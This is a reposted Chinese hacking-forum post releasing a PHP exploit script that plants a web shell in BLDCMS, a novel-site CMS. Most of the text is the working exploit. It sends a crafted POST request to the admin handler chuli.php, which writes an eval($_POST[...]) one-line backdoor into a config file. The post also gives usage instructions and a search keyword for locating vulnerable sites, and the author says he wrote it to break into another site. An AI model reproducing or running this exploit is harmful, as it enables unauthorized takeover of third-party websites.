网站地图    收藏   

主页 > 后端 > 网站安全 >

BLDCMS(白老大小说) Getshell 0day EXP - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了既然都有人发...

之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
 
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 
 
既然都有人发了 我就把我之前写好的EXP放出来吧

<?php
echo "-------------------------------------------------------------------------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun QQ:981009941\r\n                                2013.3.21\r\n                    
           用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-------------------------------------------------------------------------------\r\n";
$url=$argv[1];
$dir=$argv[2];
$pass=$argv[3];
$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
if (empty($pass)||empty($url))
{exit("请输入参数");}
else
{
$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$eval;
$length = strlen($fuckdata); 
function getshell($url,$pass)
{
global $url,$dir,$pass,$eval,$length,$fuckdata;
$header = "POST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
$header .= "Content-Type: application/x-www-form-urlencoded\r\n"; 
$header .= "User-Agent: MSIE\r\n"; 
$header .= "Host:".$url."\r\n";
$header .= "Content-Length: ".$length."\r\n";
$header .= "Connection: Close\r\n";
$header .="\r\n";
$header .= $fuckdata."\r\n\r\n";
$fp = fsockopen($url, 80,$errno,$errstr,15);
if (!$fp)
{
exit ("利用失败:请检查指定目标是否能正常打开");
}
else{ if (!fputs($fp,$header))
{exit ("利用失败");}
else
{
$receive = '';
while (!feof($fp)) {
$receive .= @fgets($fp, 1000);
}
@fclose($fp);
echo "$url/$dir/conn/config/normal2.php pass:$pass(如连接失败 请检查目标GPC是否=off)";
}}
}
}
getshell($url,$pass);
?>


by 数据流

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论